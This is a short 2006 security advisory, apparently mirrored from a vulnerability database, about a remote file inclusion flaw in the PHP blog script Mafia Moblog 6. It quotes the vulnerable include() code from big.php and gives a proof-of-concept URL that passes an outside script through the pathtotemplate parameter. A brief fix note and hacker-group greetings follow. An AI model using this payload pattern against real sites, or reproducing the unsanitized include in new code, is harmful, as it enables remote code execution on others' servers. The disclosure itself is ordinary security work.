Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13861
HistoryAug 11, 2006 - 12:00 a.m.

Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

2006-08-1100:00:00
vulners.com
135


Mafia Moblog pathtotemplate Remote File Inclusion



Author : Sh3ll

Date : 2006/04/30

HomePage : http://www.sh3ll.ir

Contact : sh3ll[at]sh3ll[dot]ir



Affected Software Description:


Application : Mafia Moblog

version : 6

Venedor : http://mafia.pearlabs.org

Class : Remote File Inclusion

Risk : High

Summary :

A Free, Fully Customizeable, Open-Source MoBlog script that will run on any

platform that is PHP and MySQL compatible.

------------------------------------------------------------------------
-------------------

Vulnerability:

~~~~~~~~~~~~~

The problem exists is in the big.php when used the variable $pathtotemplate in a

include() function without being Declared.

----------------------------------------big.php-------------------------
-------------------

...

<?php

include("info.php");

include("template.php");

if (file_exists("$pathtotemplate/includes.php")) {include("$pathtotemplate/includes.php");}

include("$pathtotemplate/big.php");

?>

...

------------------------------------------------------------------------
-------------------

PoC:

~~~

http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]

Solution:

~~~~~~~~

Sanitize Variabel $pathtotemplate in big.php

------------------------------------------------------------------------
-------------------

Note:

~~~~

venedor contacted, but no response. so do a dirty patch.

------------------------------------------------------------------------
-------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams